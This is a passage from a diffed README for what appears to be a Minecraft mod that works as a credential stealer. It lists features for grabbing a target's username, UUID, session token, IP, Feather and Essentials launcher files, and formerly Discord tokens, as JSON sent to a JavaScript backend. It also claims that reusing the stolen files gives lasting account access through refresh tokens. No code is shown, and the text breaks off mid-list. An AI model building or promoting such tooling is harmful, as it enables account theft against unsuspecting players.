coolman771/server/README.md

 > Check out [DxxxxY/TokenAuth](https://github.com/DxxxxY/TokenAuth), a session id login mod.

 ## Features
+> 1.12.2 bundles another version of JNA which refuses to decrypt the tokens which I cannot shade myself and relocate because the JVM does not trust other JNA paths.
-- Grabs the **username, uuid, token, ip, feather file, essentials file and discord tokens** of a target as a *JSON*.
+- Grabs the **username, uuid, token, ip, feather file, essentials file and ~~discord tokens~~** of a target as a *JSON*.
 - Apparently switching the feather or essential files with yours grants you infinite access to their account thanks to the **refreshToken**.
 (Unconfirmed, ask Annah#5795)
 - Additionally, it stores a **formatted session string** ready to use with [DxxxxY/TokenAuth](https://github.com/DxxxxY/TokenAuth).
 - JavaScript backend server which: